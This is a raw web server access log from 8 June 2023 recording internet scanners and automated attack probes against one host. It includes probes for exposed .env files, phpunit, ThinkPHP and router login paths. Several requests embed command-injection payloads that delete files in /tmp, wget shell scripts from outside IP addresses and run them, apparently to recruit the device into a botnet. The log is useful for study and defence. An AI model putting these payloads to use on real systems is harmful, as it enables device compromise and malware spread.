188.166.181.151 - - [08/Jun/2023:02:33:46 +0200] "\x16\x03\x01" 400 383 "-" "-" 188.166.181.151 - - [08/Jun/2023:02:33:46 +0200] "\x16\x03\x01" 400 383 "-" "-" 188.166.181.151 - - [08/Jun/2023:02:33:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.181.151 - - [08/Jun/2023:02:33:47 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.181.151 - - [08/Jun/2023:02:33:47 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 188.166.181.151 - - [08/Jun/2023:02:33:47 +0200] "\x16\x03\x01" 400 383 "-" "-" 188.166.181.151 - - [08/Jun/2023:02:33:48 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.181.151 - - [08/Jun/2023:02:33:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 188.166.181.151 - - [08/Jun/2023:02:33:49 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.181.151 - - [08/Jun/2023:02:33:49 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.181.151 - - [08/Jun/2023:02:33:49 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 103.37.60.11 - - [08/Jun/2023:02:50:33 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+103.16.161.29/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 45.128.232.62 - - [08/Jun/2023:03:03:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 109.205.213.30 - - [08/Jun/2023:03:54:05 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 178.128.152.119 - - [08/Jun/2023:03:56:57 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0" 103.12.135.123 - - [08/Jun/2023:03:58:01 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 194.165.16.72 - - [08/Jun/2023:04:12:40 +0200] "\x03" 400 383 "-" "-" 85.9.117.237 - - [08/Jun/2023:04:28:24 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 167.248.133.50 - - [08/Jun/2023:05:00:48 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.248.133.50 - - [08/Jun/2023:05:00:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.50 - - [08/Jun/2023:05:00:49 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.50 - - [08/Jun/2023:05:00:49 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.50 - - [08/Jun/2023:05:00:49 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 143.198.18.114 - - [08/Jun/2023:05:29:41 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 143.198.18.114 - - [08/Jun/2023:05:37:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 143.198.18.114 - - [08/Jun/2023:05:37:35 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 111.20.101.69 - - [08/Jun/2023:05:44:37 +0200] "GET / HTTP/1.1" 400 383 "-" "-" 58.144.148.20 - - [08/Jun/2023:05:49:57 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 58.144.148.20 - - [08/Jun/2023:05:49:58 +0200] "GET / HTTP/1.1" 200 423 "-" "curl/7.58.0" 45.79.172.21 - - [08/Jun/2023:06:14:50 +0200] "\x16\x03\x01" 400 383 "-" "-" 205.210.31.149 - - [08/Jun/2023:06:20:14 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 147.53.202.217 - - [08/Jun/2023:06:41:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 45.155.204.17 - - [08/Jun/2023:06:42:36 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 109.205.213.104 - - [08/Jun/2023:06:43:22 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 185.180.143.190 - - [08/Jun/2023:07:21:10 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 36.225.134.184 - - [08/Jun/2023:07:59:17 +0200] "GET / HTTP/1.1" 400 383 "-" "-" 125.88.229.99 - - [08/Jun/2023:08:16:37 +0200] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:38 +0200] "GET /?author=1 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:38 +0200] "GET /?author=2 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:38 +0200] "GET /?author=3 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:39 +0200] "GET /?author=4 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:39 +0200] "GET /?author=5 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:40 +0200] "GET /?author=6 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:43 +0200] "GET /?author=7 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:46 +0200] "GET /?author=8 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:47 +0200] "GET /?author=9 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:47 +0200] "GET /?author=10 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:48 +0200] "GET /?author=11 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:48 +0200] "GET /?author=12 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:49 +0200] "GET /?author=13 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:49 +0200] "GET /?author=14 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:49 +0200] "GET /?author=15 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:50 +0200] "GET /?author=16 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:50 +0200] "GET /?author=17 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:51 +0200] "GET /?author=18 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:51 +0200] "GET /?author=19 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 125.88.229.99 - - [08/Jun/2023:08:16:52 +0200] "GET /?author=20 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 165.232.188.145 - - [08/Jun/2023:08:17:03 +0200] "\x16\x03\x01" 400 383 "-" "-" 165.232.188.145 - - [08/Jun/2023:08:17:04 +0200] "\x16\x03\x01" 400 383 "-" "-" 165.232.188.145 - - [08/Jun/2023:08:17:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 165.232.188.145 - - [08/Jun/2023:08:17:04 +0200] "GET /client/get_targets HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 165.232.188.145 - - [08/Jun/2023:08:17:05 +0200] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0" 165.232.188.145 - - [08/Jun/2023:08:17:05 +0200] "\x16\x03\x01" 400 383 "-" "-" 165.232.188.145 - - [08/Jun/2023:08:17:05 +0200] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 165.232.188.145 - - [08/Jun/2023:08:17:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)" 165.232.188.145 - - [08/Jun/2023:08:17:06 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 165.232.188.145 - - [08/Jun/2023:08:17:06 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 165.232.188.145 - - [08/Jun/2023:08:17:07 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 151.246.22.143 - - [08/Jun/2023:08:33:01 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 193.151.225.226 - - [08/Jun/2023:08:56:03 +0200] "GET /wp-content/plugins/mstore-api/assets/js/mstore-inspireui.js HTTP/1.1" 404 419 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" 82.196.9.7 - - [08/Jun/2023:08:57:57 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 185.233.19.113 - - [08/Jun/2023:09:07:38 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 83.97.73.89 - - [08/Jun/2023:09:19:01 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 179.43.177.244 - - [08/Jun/2023:09:20:58 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello World" 83.97.73.89 - - [08/Jun/2023:09:26:31 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.79.172.21 - - [08/Jun/2023:09:42:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 91.224.205.118 - - [08/Jun/2023:09:47:43 +0200] "GET /wp-content/plugins/mstore-api/assets/js/mstore-inspireui.js HTTP/1.1" 404 411 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" 109.205.213.4 - - [08/Jun/2023:09:53:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x03\x01W\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x03\x01I\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x03\x01\x9a\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x02\x01\x9b\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x01\x01\xa8\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x01\x01\xa8\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x01\x01\x9e\x01" 400 383 "-" "-" 82.196.9.7 - - [08/Jun/2023:09:58:51 +0200] "\x16\x03\x01\x01\xb5\x01" 400 383 "-" "-" 216.47.245.138 - - [08/Jun/2023:10:15:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 109.123.233.255 - - [08/Jun/2023:10:19:02 +0200] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 109.123.233.255 - - [08/Jun/2023:10:19:03 +0200] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.76 Mobile Safari/537.36" 109.123.233.255 - - [08/Jun/2023:10:19:06 +0200] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:10:23:02 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.180.48.85 - - [08/Jun/2023:10:26:08 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 83.97.73.89 - - [08/Jun/2023:10:43:53 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.170.144.3 - - [08/Jun/2023:10:50:32 +0200] "\x03" 400 383 "-" "-" 34.78.6.216 - - [08/Jun/2023:10:55:45 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.2" 162.216.150.253 - - [08/Jun/2023:11:13:08 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 86.107.104.234 - - [08/Jun/2023:11:49:36 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:65.0) Gecko/20100101 Firefox/65.0" 83.97.73.89 - - [08/Jun/2023:11:55:30 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:12:18:21 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.131 - - [08/Jun/2023:12:25:26 +0200] "\x16\x03\x01" 400 383 "-" "-" 139.60.150.14 - - [08/Jun/2023:12:32:41 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 139.60.150.14 - - [08/Jun/2023:12:32:42 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 65.157.23.94 - - [08/Jun/2023:12:48:51 +0200] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 65.157.23.94 - - [08/Jun/2023:12:48:51 +0200] "POST /admin HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 139.59.174.26 - - [08/Jun/2023:13:04:24 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 138.68.208.19 - - [08/Jun/2023:13:14:30 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 83.97.73.89 - - [08/Jun/2023:13:16:13 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 184.105.247.194 - - [08/Jun/2023:13:37:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 184.105.247.194 - - [08/Jun/2023:13:39:43 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 184.105.247.194 - - [08/Jun/2023:13:40:48 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 83.97.73.89 - - [08/Jun/2023:13:51:54 +0200] "GET /console/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 109.205.213.107 - - [08/Jun/2023:13:59:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 185.180.143.75 - - [08/Jun/2023:14:17:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:14:33:26 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.180.48.85 - - [08/Jun/2023:15:03:16 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 212.244.88.51 - - [08/Jun/2023:15:06:18 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 216.24.212.226 - - [08/Jun/2023:15:14:31 +0200] "GET / HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:15:14:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 188.226.166.7 - - [08/Jun/2023:15:23:37 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 109.205.213.8 - - [08/Jun/2023:15:41:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 185.225.31.29 - - [08/Jun/2023:15:53:22 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:90.0) Gecko/20100101 Firefox/90.0" 64.227.164.59 - - [08/Jun/2023:16:01:12 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:16:13:17 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 93.183.156.161 - - [08/Jun/2023:16:19:48 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 117.210.218.0 - - [08/Jun/2023:16:34:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 104.248.229.49 - - [08/Jun/2023:16:38:02 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 104.248.229.49 - - [08/Jun/2023:16:38:13 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 104.248.229.49 - - [08/Jun/2023:16:38:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 83.97.73.89 - - [08/Jun/2023:16:57:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 63.214.171.26 - - [08/Jun/2023:17:10:28 +0200] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 63.214.171.26 - - [08/Jun/2023:17:10:29 +0200] "POST /app HTTP/1.1" 404 279 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 167.99.13.19 - - [08/Jun/2023:17:18:49 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 167.99.13.19 - - [08/Jun/2023:17:18:59 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 167.99.13.19 - - [08/Jun/2023:17:19:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 109.205.213.104 - - [08/Jun/2023:17:33:09 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "r00ts3c-owned-you" 69.194.182.221 - - [08/Jun/2023:17:59:37 +0200] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 69.194.182.221 - - [08/Jun/2023:17:59:38 +0200] "POST /backend HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:18:09:05 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.97.73.89 - - [08/Jun/2023:18:25:40 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 183.136.225.32 - - [08/Jun/2023:18:57:34 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 159.65.168.103 - - [08/Jun/2023:19:02:09 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 